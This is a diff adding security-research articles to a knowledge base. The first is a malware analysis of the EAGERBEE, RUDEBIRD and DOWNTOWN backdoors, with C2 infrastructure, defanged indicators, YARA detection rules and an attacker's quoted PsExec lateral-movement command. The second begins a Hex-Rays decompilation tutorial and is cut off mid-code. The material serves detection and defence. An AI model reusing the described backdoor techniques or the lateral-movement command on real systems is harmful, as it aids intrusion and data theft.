+The author employs a global variable embedded in the source code to select between modes. Importantly, both are included in the binary, with only one being executed based on the selection. Leaving this dormant capability in the binary may have been a mistake, but one that helps researchers understand the technical maturity of this group. Generally speaking, malware authors benefit from removing unused code that may be used against them.
+
+![Both forward and reverse connection functionalities are present in the binary](/assets/images/introducing-the-ref5961-intrusion-set/image16.png)
+
+
+**_Note: In C programming, modularity is achieved through the use of #define directives to selectively include or exclude code parts in the compiled binary. However, the malware developer employed a less advisable approach in this case. They utilized static global variables whose values are set during compilation. Consequently, the resulting binary contains both utilized and unused functions. During runtime, the binary assesses the value of these static global variables to determine its behavior. Though functional, this is neither the best programming nor tradecraft practice as it permits analysis and detection engineering of code used outside the identified intrusion._**
+
+The malware has the capability to detect the presence of an HTTP proxy configuration on the host machine by inspecting the `ProxyEnable` registry key within `Software\Microsoft\windows\CurrentVersion\Internet Settings`. If this key value is set to `1`, the malware extracts the information in the `ProxyServer` key. 
+
+If no proxy server is set, the malware connects directly to C2. 
+
+However, if the proxy settings are defined, the malware also initializes the proxy by sending a `CONNECT` request, and its data to the configured destination. The malware author made a typo in the HTTP request code; they mistakenly wrote `DONNECT` instead of `CONNECT` in the HTTP request string in the binary. This is a reliably unique indicator for those analyzing network captures.
+	
+![HTTP request string to connect to the setup proxy](/assets/images/introducing-the-ref5961-intrusion-set/image12.png)
+
+
+Upon establishing a connection to C2, The malware downloads executable files from C2, likely pushed automatically. It validates that each executable is 64bit, then extracts the entry point and modifies memory protections to allow execution using the VirtualProtect API.
+
+![Payload execution in the same process](/assets/images/introducing-the-ref5961-intrusion-set/image7.png)
+
+
+### EAGERBEE connection to a Mongolian campaign
+
+During our EAGERBEE analysis, we also saw an additional two (previously unnamed) EAGERBEE [samples](https://www.virustotal.com/gui/search/09005775FC587AC7BF150C05352E59DC01008B7BF8C1D870D1CEA87561AA0B06%250AA191D8059E93C0AB479DE45CDD91C41B985F9BCCD7B2CAD9F171FEA1C5F19E2E/files) involved in a targeted campaign focused on Mongolia. These two EAGERBEE samples were both respectively bundled with other files and used a similar naming convention (`iconcache.mui` for EAGERBEE and `iconcaches.mui` in the Mongolian campaign). The samples consisted of multiple files and a lure document.
+
+![Decompressed files inside Mongolian campaign sample](/assets/images/introducing-the-ref5961-intrusion-set/image15.png)
+
+
+While analyzing the Mongolian campaign samples, we found a previous [webpage](https://www.virustotal.com/gui/url/7e0d899d54c6a0f43fbac0e633d821eefa9057e29df8c4956321fe947daaaa54) (`http://president[.]mn/en/ebooksheets.php`) hosted under Mongolian infrastructure serving a [RAR file](https://www.virustotal.com/gui/file/af8cb76d9d955d654ec89b85d1ab35e1886ec2ba1a8c600a451d1bd383fb4e66/detection) named `20220921_2.rar`. Given the VirusTotal scan date of the file and the filename, it is likely to have been created in September 2022.
+
+The lure text is centered around the regulations for the “Billion Trees National Movement Fund” and has been an important [topic](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) in recent years related to an initiative taken on by Mongolia. To address food security, climate impacts, and naturally occurring but accelerating desertification, Mongolia’s government has undertaken an ambitious goal of planting one billion trees throughout the country.
+
+![Lure document](/assets/images/introducing-the-ref5961-intrusion-set/image5.png)
+
+
+For this infection chain, they leveraged a signed Kaspersky application in order to sideload a [malicious DLL](https://www.virustotal.com/gui/file/4b3dc8609cba089e666b2086264e6f71dada57fdb3f160d2f5e546881a278766/relations). Upon execution, sensitive data and files were collected from the machine and uploaded to a hard-coded Mongolian government URL (`www.president[.]mn/upload.php`) via cURL. Persistence is configured using a Registry Run Key.
+
+![Hard-coded domain in first sample](/assets/images/introducing-the-ref5961-intrusion-set/image14.png)
+
+
+**_Note: Though it does not contain the .gov second-level domain, www.president[.]mn does appear to be the official domain of the President of Mongolia, and is hosted within government infrastructure. Abuse email is directed to oyunbold@datacenter.gov[.]mn which appears to be legitimate._** Based on string formatting and underlying behavior, this sample aligns with public [reporting](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) from AVAST related to a utility they call DataExtractor1.
+
+![Sensitive file collection on different drives](/assets/images/introducing-the-ref5961-intrusion-set/image9.png)
+
+
+While we didn’t find a WinRAR archive for the other linked sample, we found this related [executable](https://www.virustotal.com/gui/file/a191d8059e93c0ab479de45cdd91c41b985f9bccd7b2cad9f171fea1c5f19e2e). It functions similarly, using a different callback domain hosted on Mongolian infrastructure (`https://intranet.gov[.]mn/upload.php`).
+
+![Hard-coded domain in the second sample](/assets/images/introducing-the-ref5961-intrusion-set/image13.png)
+
+
+While it is not clear how this infrastructure was compromised or the extent to which it has been used, impersonating trusted systems may have enabled the threat to compromise other victims and collect intelligence.
+
+### EAGERBEE Summary
+
+EAGERBEE is a technically straightforward backdoor with forward and reverse C2 and SSL encryption capabilities, used to conduct basic system enumeration and deliver subsequent executables for post-exploitation. The C2 mode is defined at compile time, and configurable with an associated config file with hardcoded fallback.
+
+Using code overlap analysis, and the fact that EAGERBEE was bundled with other samples from VirusTotal, we identified a C2 server hosted on Mongolian government infrastructure. The associated lure documents also reference Mongolian government policy initiatives. This leads us to believe that the Mongolian government or non-governmental organizations (NGOs) may have been targeted by the REF2924 threat actor.
+
+## RUDEBIRD
+
+Within the contested REF2924 environment, Elastic Security Labs identified a lightweight Windows backdoor that communicates over HTTPS and contains capabilities to perform reconnaissance and execute code. We refer to this malware family as RUDEBIRD.
+
+### Initial execution
+
+The backdoor was executed by a file with an invalid signature, `C:\Windows\help\RVTDM.exe`, which resembles the Sysinternals screen magnifier utility ZoomIt. Shortly after being executed, Elastic Defend registered a process injection alert. 
+
+![PE signature and original filename details of RVTDM.exe](/assets/images/introducing-the-ref5961-intrusion-set/image28.png)
+
+
+The process was executed with the parent process (`w3wp.exe`) coming from a Microsoft Exchange application pool. This is consistent with the exploitation of an unpatched Exchange vulnerability, and prior research supports that hypothesis.
+
+### Lateral movement
+
+RUDEBIRD used PsExec (`exec.exe`) to execute itself from the SYSTEM account and then move laterally from victim 0 to another targeted host. It is unclear if PsExec was brought to the environment by the threat actor or if it was already present in the environment. 
+
+`"C:\windows\help\exec.exe" /accepteula \\{victim-1} -d -s C:\windows\debug\RVTDM.EXE`
+
+### Code analysis
+
+RUDEIBIRD is composed of shellcode that resolves imports dynamically by accessing the Thread Environment Block (TEB) / Process Environment Block (PEB) and walking the loaded modules to find base addresses for the `kernel32.dll` and `ntdll.dll` modules. These system DLLs contain crucial functions that will be located by the malware in order to interact with the Windows operating system.
+
+![Resolving imports using TEB/PEB](/assets/images/introducing-the-ref5961-intrusion-set/image22.png)
+
+
+RUDEBIRD uses a straightforward API hashing algorithm with multiplication (`0x21`) and addition that is [publicly available](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) from OALabs. This provides defense against static-analysis tools that analysts may use to inspect the import table and discern what capabilities a binary has.
+
+![RUDEBIRD API Hashing algorithm](/assets/images/introducing-the-ref5961-intrusion-set/image11.png)
+
+
+After resolving the libraries, there is an initial enumeration function that collects several pieces of information including:
+* Hostname
+* Computer name
+* Username
+* IP Address
+* System architecture
+* Privilege of the current user
+
+For some functions that return larger amounts of data, the malware implements compression using `RtlCompressBuffer`. The malware communicates using HTTPS to IP addresses loaded in memory from its configuration. We observed two IP addresses in the configuration in our sample:
+
+* `45.90.58[.]103`
+* `185.195.237[.]123`
+
+Strangely, there are several functions throughout the program that include calls to `OutputDebugStringA`. This function is typically used during the development phase and serves as a mechanism to send strings to a debugger while testing a program. Normally, these debug messages are expected to be removed after development is finished. For example, the result of the administrator check is printed if run inside a debugger.
+
+![RUDEBIRD debug string](/assets/images/introducing-the-ref5961-intrusion-set/image21.png)
+
+
+RUDEBIRD uses mutexes to maintain synchronization throughout its execution. On launch, the mutex is set to `VV.0`.
+
+![RUDEBIRD mutex](/assets/images/introducing-the-ref5961-intrusion-set/image24.png)
+
+
+After the initial enumeration stage, RUDEBIRD operates as a traditional backdoor with the following capabilities:
+* Retrieve victim’s desktop directory path
+* Retrieve disk volume information 
+* Perform file/directory enumeration
+* Perform file operations such as reading/writing file content
+* Launch new processes
+* File/folder operations such as creating new directories, move/copy/delete/rename files
+* Beacon timeout option
+
+## DOWNTOWN (SManager/PhantomNet)
+
+In the REF2924 environment, we observed a modular implant we call DOWNTOWN. This sample shares a plugin architecture, and code similarities, and aligns with the victimology described in the publicly reported malware [SManager/PhantomNet](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager). While we have little visibility into the impacts of its overall use, we wanted to share any details that may help the community. 
+
+SManager/PhantomNet has been attributed to [TA428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) (Colourful Panda, BRONZE DUDLEY), a threat actor likely sponsored by the Chinese government. Because of the shared plugin architecture, code similarities, and victimology, we are attributing DOWNTOWN with a moderate degree of confidence to a nationally sponsored Chinese threat actor.
+
+### Code analysis
+
+For DOWNTOWN, we collected the plugin from a larger framework. This distinction is made based on unique and shared exports from previously published [research](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) by ESET. One of the exports contains the same misspelling previously identified in the ESET blog, `GetPluginInfomation` (note: `Infomation` is missing an `r`). The victimology of REF2924 is consistent with their reported victim vertical and region.
+
+![DOWNTOWN exports](/assets/images/introducing-the-ref5961-intrusion-set/image8.png)
+
+
+In our sample, the plugin is labeled as “ExplorerManager”. 
+
+![GetPlugInfomation export](/assets/images/introducing-the-ref5961-intrusion-set/image26.png)
+
+
+The majority of the code appears to be centered around middleware functionality (linked lists, memory management, and thread synchronization) used to task the malware. 
+
+![Strings found inside DOWNTOWN sample](/assets/images/introducing-the-ref5961-intrusion-set/image4.png)
+
+
+In a similar fashion to RUDEBIRD above, DOWNTOWN also included the debug functionality using  `OutputDebugStringA`. Again, debugging frameworks are usually removed once the software is moved from development to production status. This could indicate that this module is still in active development or a lack of operational scrutiny by the malware author(s).
+
+![OutputDebugStringA usage](/assets/images/introducing-the-ref5961-intrusion-set/image2.png)
+
+
+Some functionality observed in the sample included:
+* File/folder enumeration
+* Disk enumeration
+* File operations (delete/execute/rename/copy)
+
+Unfortunately, our team did not encounter any network/communication functionality or find any domain or IP addresses tied to this sample.  
+
+### DOWNTOWN Summary
+
+DOWNTOWN is part of a modular framework that shows probable ties to an established threat group. The observed plugin appears to provide middleware functionality to the main implant and contains several functions to perform enumeration.
+
+## Network infrastructure intersection
+
+When performing an analysis of the network infrastructure for EAGERBEE and RUDEBIRD, we identified similarities in the domain hosting provider, subdomain naming, registration dates, and service enablement between the two malware families’ C2 infrastructure. Additionally, we were able to use TLS leaf certificate fingerprints to establish another connection between EAGERBEE and the Mongolian campaign infrastructure.
+
+### Shared network infrastructure
+
+As identified in the malware analysis section for EAGERBEE, there were two IP addresses used for C2: `185.82.217[.]164` and `195.123.245[.]79`.
+
+Of the two, `185.82.217[.]164` had an expired TLS certificate registered to it for `paper.hosted-by-bay[.]net`. The subdomain registration for `paper.hosted-by-bay[.]net` and the TLS certificate were registered on December 14, 2020.
+
+![paper.hosted-by-bay[.]net TLS certificate](/assets/images/introducing-the-ref5961-intrusion-set/image17.jpg)
+
+
+As identified in the malware analysis section for RUDEBIRD, there were two IP addresses used for C2: `45.90.58[.]103` and `185.195.237[.]123`.
+
+`45.90.58[.]103` was used to register the subdomain `news.hosted-by-bay[.]net`, on December 13, 2020.
+
+Both IP addresses (one from EAGERBEE and one from RUDEBIRD) were assigned to subdomains (`paper.hosted-by-bay[.]net` and `news.hosted-by-bay[.]net`) within one day at the domain `hosted-by-bay[.]net`.
+
+**_Note: While `195.123.245[.]79` (EAGERBEE) and `185.195.237[.]123` (RUDEBIRD) are malicious, we were unable to identify anything atypical of normal C2 nodes. They used the same defense evasion technique (described below) used by `185.82.217[.]164` (EAGERBEE) and `45.90.58[.]103` (RUDEBIRD)._**
+
+### Domain analysis
+
+When performing an analysis of the `hosted-by-bay[.]net` domain, we see that it is registered to the IP address `45.133.194[.]106`. This IP address exposes two TCP ports, one is the expected TLS port of `443`, and the other is `62753`.
+
+**_Note: Port `443` has a Let’s Encrypt TLS certificate for `paypal.goodspaypal[.]com`. This domain does not appear to be related to this research but should be categorized as malicious based on its registration to this IP._**
+
+On port `62753`, there was a self-signed wildcard TLS leaf certificate with a fingerprint of `d218680140ad2c6e947bf16020c0d36d3216f6fc7370c366ebe841c02d889a59` (`*.REDACTED[.]mn`). This fingerprint is used for one host, `shop.REDACTED[.]mn`. The 10-year TLS certificate was registered on December 13, 2020.
+
+```
+Validity
+Not Before: 2020-12-13 11:53:20
+Not After: 2030-12-11 11:53:20
+Subject: CN=shop.REDACTED[.]mn
+```
+
+`.mn` is the Internet ccTLD for Mongolia and REDACTED is a large bank in Mongolia. When researching the network infrastructure for REDACTED, we can see that they do currently own their DNS infrastructure.
+
+It does not appear that `shop.REDACTED[.]mn` was ever registered. This self-signed TLS certificate was likely used to encrypt C2 traffic. While we cannot confirm that this certificate was used for EAGERBEE or RUDEBIRD, in the malware code analysis of both EAGERBEE and RUDEBIRD, we identified that TLS to an IP address is an available malware configuration option. We do believe that this domain is related to EAGERBEE and RUDEBIRD based on the registration dates, IP addresses, and subdomains of the `hosted-by-bay[.]net` domain.
+
+As noted in the EAGERBEE malware analysis, we identified two other previously unnamed EAGERBEE samples used to target Mongolian victims and also leveraged Mongolian C2 infrastructure.
+
+### Defense evasion
+
+Finally, we see all of the C2 IP addresses add and remove services at similar dates and times. This is a tactic to hinder the analysis of the C2 infrastructure by limiting its availability. It should be noted that the history of the service enablement and disablement (provided by [Censys.io](https://search.censys.io/) databases) is meant to show possible coordination in C2 availability. The images below show the last service change windows, further historical data was not available.
+
+`192.123.245[.]79` had TCP port `80` enabled on September 22, 2023 at 07:31 and then disabled on September 24, 2023 at 07:42.
+
+![192.123.245[.]79 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image6.jpg)
+
+
+`185.195.237[.]123` had TCP port `443` enabled on September 22, 2023 at 03:33 and then disabled on September 25, 2023 at 08:08.
+
+![185.195.237[.]123 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image23.jpg)
+
+
+`185.82.217[.]164` had TCP port `443` enabled on September 22, 2023 at 08:49 and then disabled on September 25, 2023 at 01:02.
+
+![185.82.217[.]164 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image20.jpg)
+
+
+`45.90.58[.]103` had TCP port `443` enabled on September 22, 2023 at 04:46 and then disabled on September 24, 2023 at 09:57.
+
+![45.90.58[.]103 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image10.jpg)
+
+
+### Network intersection summary
+
+EAGERBEE and RUDEBIRD are two malware samples, co-resident on the same infected endpoint, in the same environment. This alone builds a strong association between the families. 
+
+When adding the fact that both families use C2 endpoints that have been used to register subdomains on the same domain `hosted-by-bay[.]net`), and the service availability coordination, leads us to say with a high degree of confidence that the malware and campaign operators are from the same tasking authority, or organizational umbrella.
+
+## Summary
+
+EAGERBEE, RUDEBIRD, and DOWNTOWN backdoors all exhibit characteristics of incompleteness whether using “Test” in file/service names, ignoring compilation best practices, leaving orphaned code, or leaving a smattering of extraneous debug statements.
+
+They all, however, deliver similar tactical capabilities in the context of this environment.
+* Local enumeration
+* Persistence
+* Download/execute additional tooling
+* C2 options
+
+The variety of tooling performing the same or similar tasks with varying degrees and types of miscues causes us to speculate that this environment has attracted the interest of multiple players in the REF2924 threat actor’s organization. The victim's status as a government diplomatic agency would make it an ideal candidate as a stepping-off point to other targets within and outside the agency’s national borders. Additionally, it is easy to imagine that multiple entities within a national intelligence apparatus would have collection requirements that could be satisfied by this victim directly. 
+
+This environment has already seen the emergence of the REF2924 intrusion set (SIESTAGRAPH, NAPLISTENER, SOMNIRECORD, and DOORME), as well as the deployment of SHADOWPAD and COBALTSTRIKE. The REF2924 and REF5961 threat actor(s) continue to deploy new malware into their government victim’s environment.
+
+## REF5961 and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advance persistent threats used against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+* EAGERBEE
+  * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+  * [Discovery](https://attack.mitre.org/tactics/TA0007/)
+  * [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+  * [Execution](https://attack.mitre.org/tactics/TA0002/)
+* RUDEBIRD
+  * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+  * [Collection](https://attack.mitre.org/tactics/TA0009/)
+  * [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+  * [Discovery](https://attack.mitre.org/tactics/TA0007/)
+  * [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)
+  * [Execution](https://attack.mitre.org/tactics/TA0002/)
+* DOWNTOWN
+  * [Discovery](https://attack.mitre.org/tactics/TA0007/)
+  * [Collection](https://attack.mitre.org/tactics/TA0009/)
+
+### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+* EAGERBEE
+  * [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)
+  * [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+  * [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)
+  * [Proxy](https://attack.mitre.org/techniques/T1090/)
+  * [Process Injection](https://attack.mitre.org/techniques/T1055/)
+* RUDEBIRD
+  * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)
+  * [System Information Discovery](https://attack.mitre.org/techniques/T1082)
+  * [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
+  * [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/)
+  * [Data from Local System](https://attack.mitre.org/techniques/T1005)
+* DOWNTOWN
+  * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)
+  * [System Information Discovery](https://attack.mitre.org/techniques/T1082)
+
+## Malware prevention capabilities
+* [EAGERBEE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_EagerBee.yar)
+* [RUDEBIRD](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RudeBird.yar)
+* [DOWNTOWN](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DownTown.yar)
+
+## YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the EAGERBEE, RUDEBIRD, and DOWNTOWN malware:
+
+### EAGERBEE
+```
+rule Windows_Trojan_EagerBee_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.EagerBee"
+        reference_sample = "09005775fc587ac7bf150c05352e59dc01008b7bf8c1d870d1cea87561aa0b06"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a1 = { C2 EB D6 0F B7 C2 48 8D 0C 80 41 8B 44 CB 14 41 2B 44 CB 0C 41 }
+        $a2 = { C8 75 04 33 C0 EB 7C 48 63 41 3C 8B 94 08 88 00 00 00 48 03 D1 8B }
+
+    condition:
+        all of them
+}
+
+rule Windows_Trojan_EagerBee_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-09-04"
+        last_modified = "2023-09-20"
+        threat_name = "Windows.Trojan.EagerBee"
+        reference_sample = "339e4fdbccb65b0b06a1421c719300a8da844789a2016d58e8ce4227cb5dc91b"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $dexor_config_file = { 48 FF C0 8D 51 FF 44 30 00 49 03 C4 49 2B D4 ?? ?? 48 8D 4F 01 48 }
+        $parse_config = { 80 7C 14 20 3A ?? ?? ?? ?? ?? ?? 45 03 C4 49 03 D4 49 63 C0 48 3B C1 }
+        $parse_proxy1 = { 44 88 7C 24 31 44 88 7C 24 32 48 F7 D1 C6 44 24 33 70 C6 44 24 34 3D 88 5C 24 35 48 83 F9 01 }
+        $parse_proxy2 = { 33 C0 48 8D BC 24 F0 00 00 00 49 8B CE F2 AE 8B D3 48 F7 D1 48 83 E9 01 48 8B F9 }
+
+    condition:
+        2 of them
+}
+```
+
+### RUDEBIRD
+```
+rule Windows_Trojan_RudeBird {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-09"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.RudeBird"
+        license = "Elastic License v2"
+        os = "windows"
+
+  strings:
+        $a1 = { 40 53 48 83 EC 20 48 8B D9 B9 D8 00 00 00 E8 FD C1 FF FF 48 8B C8 33 C0 48 85 C9 74 05 E8 3A F2 }
+
+    condition:
+        all of them
+}
+```
+
+### DOWNTOWN
+```
+rule Windows_Trojan_DownTown_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-05-10"
+        last_modified = "2023-06-13"
+        threat_name = "Windows.Trojan.DownTown"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a1 = "SendFileBuffer error -1 !!!" fullword
+        $a2 = "ScheduledDownloadTasks CODE_FILE_VIEW " fullword
+        $a3 = "ExplorerManagerC.dll" fullword
+
+    condition:
+        3 of them
+}
+
+rule Windows_Trojan_DownTown_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-08-23"
+        last_modified = "2023-09-20"
+        threat_name = "Windows.Trojan.DownTown"
+        license = "Elastic License v2"
+        os = "windows"
+
+    strings:
+        $a1 = "DeletePluginObject"
+        $a2 = "GetPluginInfomation"
+        $a3 = "GetPluginObject"
+        $a4 = "GetRegisterCode"
+
+    condition:
+        all of them
+}
+```
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref5961) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type    | Name               | Reference      |
+|------------------------------------------------------------------|---------|--------------------|----------------|
+| `ce4dfda471f2d3fa4e000f9e3839c3d9fbf2d93ea7f89101161ce97faceadf9a` | SHA-256 | EAGERBEE shellcode | iconcaches.mui |
+| `29c90ac124b898b2ff2a4897921d5f5cc251396e8176fc8d6fa475df89d9274d` | SHA-256 | DOWNTOWN           | In-memory DLL  |
+| `185.82.217[.]164`                                                 | ipv4    | EAGERBEE C2        |                |
+| `195.123.245[.]79`                                                 | ipv4    | EAGERBEE C2        |                |
+| `45.90.58[.]103`                                                   | ipv4    | RUDEBIRD C2        |                |
+| `185.195.237[.]123`                                                | ipv4    | RUDEBIRD C2        |                |
+
+## References
+
+The following were referenced throughout the above research:
+* [https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) 
+* [https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) 
+* [https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) 
+* [https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) 
+* [https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) 
+* [https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager)
+* [https://malpedia.caad.fkie.fraunhofer.de/actor/ta428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) 
+* [https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) 
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introduction_to_hexrays_decompilation_internals.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introduction_to_hexrays_decompilation_internals.md
new file mode 100644
index 0000000000000..78fe02e70d7b7
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/introduction_to_hexrays_decompilation_internals.md
@@ -0,0 +1,497 @@
+---
+title: "Introduction to Hex-Rays decompilation internals"
+slug: "introduction-to-hexrays-decompilation-internals"
+date: "2024-02-14"
+description: "In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code."
+author:
+  - slug: salim-bitam
+image: "photo-edited-05.png"
+category:
+  - slug: malware-analysis
+tags:
+  - malware-analysis
+---
+
+## Introduction
+
+In this publication, we delve into Hex-Rays microcode and explore techniques for manipulating the generated CTree to deobfuscate and annotate decompiled code. The final section includes a practical example demonstrating how to annotate a custom import table for malware analysis.
+
+This guide is meant to help reverse engineers and malware analysts better understand the internal structures used during IDA's function decompilation. We advise keeping an eye on the [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/index.shtml) that can be found under IDA PRO’s plugins directory, all the structures discussed below are sourced from it.
+
+## Architecture
+
+Hex-Rays decompiles a function through a multistage process starting with the disassembled code of a function:
+ 1. Assembly code to microcode:  
+  It does a conversion of the assembly instructions that are stored in an [`insn_t`](https://hex-rays.com/products/ida/support/sdkdoc/classinsn__t.html) structure to microcode instructions represented by a [`minsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/classminsn__t.shtml) structure
+
+ 2. CTree generation:  
+  From the optimized microcode, Hex-Rays generates the Abstract Syntax Tree(AST), its nodes are either statements ([`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml)) or expressions ([`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml)); note that both `cinsn_t` and `cexpr_t` inherit from the [`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) structure
+
+## Microcode
+
+Microcode is an intermediate language (IL) used by Hex-Rays, generated by lifting the assembly code of a binary. This has multiple advantages, one of which is that it is processor-independent.
+
+The following screenshot displays the assembly and decompiled code, alongside its microcode extracted using [Lucid](https://github.com/gaasedelen/lucid), a tool that facilitates microcode visualization.
+
+![A view of the assembly code, decompiled code, and microcode](/assets/images/introduction-to-hexrays-decompilation-internals/image5.png)
+
+We can access the MBA (microcode block array) through the `cfunc_t` structure of a decompiled function with the MBA field.
+
+_Tip:_ we get the `cfunc_t` of a decompiled function with the `ida_hexrays.decompile`.
+
+[`mba_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmba__t.shtml) is an array of micro blocks [`mblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmblock__t.shtml), the first block represents the entry point of the function and the last one represents the end. Micro blocks (`mblock_t`) are structured in a double linked list, we can access the next / previous block with `nextb`/`prevb` fields respectively. Each `mblock_t` includes a double linked list of microcode instructions `minsn_t`, accessed by the field `head` for the first instruction of the block and `tail` for the last instruction of the block. The `mblock_t` structure is depicted in the following code snippet.
+
+```C
+class mblock_t
+{
+//...
+public:
+  mblock_t *nextb;              ///< next block in the doubly linked list
+  mblock_t *prevb;              ///< previous block in the doubly linked list
+  uint32 flags;                 ///< combination of \ref MBL_ bits
+  ea_t start;                   ///< start address
+  ea_t end;                     ///< end address
+  minsn_t *head;                ///< pointer to the first instruction of the block
+  minsn_t *tail;                ///< pointer to the last instruction of the block
+  mba_t *mba;  
+```
+  
+A microcode instruction `minsn_t` is a double linked list, each microcode instruction contains 3 operands: left, right, and destination. We can access the next/previous microcode instruction of the same block with `next`/`prev` fields; the opcode field is an enumeration ([`mcode_t`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#:~:text=enum-,mcode_t,-%7B%0A%C2%A0%C2%A0m_nop)) of all the microinstruction opcodes, for example, the `m_mov` enum represents the `mov` opcode.
+
+```C
+class minsn_t
+{
+//...
+public:
+  mcode_t opcode;       ///< instruction opcode enumeration
+  int iprops;           ///< combination of \ref IPROP_ bits
+  minsn_t *next;        ///< next insn in doubly linked list. check also nexti()
+  minsn_t *prev;        ///< prev insn in doubly linked list. check also previ()
+  ea_t ea;              ///< instruction address
+  mop_t l;              ///< left operand
+  mop_t r;              ///< right operand
+  mop_t d;              ///< destination operand
+ //...
+
+enum mcode_t
+{
+  m_nop    = 0x00, // nop                       // no operation
+  m_stx    = 0x01, // stx  l,    {r=sel, d=off} // store register to memory     
+  m_ldx    = 0x02, // ldx  {l=sel,r=off}, d     // load register from memory    
+  m_ldc    = 0x03, // ldc  l=const,     d       // load constant
+  m_mov    = 0x04, // mov  l,           d       // move                        
+  m_neg    = 0x05, // neg  l,           d       // negate
+  m_lnot   = 0x06, // lnot l,           d       // logical not
+//...
+};
+```
+
+Each operand is of type [`mop_t`](https://hex-rays.com/products/decompiler/manual/sdk/classmop__t.shtml), depending on the type (accessed with the `t` field) it can hold registers, immediate values, and even nested microcode instructions. As an example, the following is the microcode of a function with multiple nested instructions:
+
+![Nested microcode instructions](/assets/images/introduction-to-hexrays-decompilation-internals/image3.png)
+
+```C
+class mop_t
+{
+	public:
+	  /// Operand type.
+	  mopt_t t;
+	union
+	  {
+	    mreg_t r;           // mop_r   register number
+	    mnumber_t *nnn;     // mop_n   immediate value
+	    minsn_t *d;         // mop_d   result (destination) of another instruction
+	    stkvar_ref_t *s;    // mop_S   stack variable
+	    ea_t g;             // mop_v   global variable (its linear address)
+	    int b;              // mop_b   block number (used in jmp,call instructions)
+	    mcallinfo_t *f;     // mop_f   function call information
+	    lvar_ref_t *l;      // mop_l   local variable
+	    mop_addr_t *a;      // mop_a   variable whose address is taken
+	    char *helper;       // mop_h   helper function name
+	    char *cstr;         // mop_str utf8 string constant, user representation
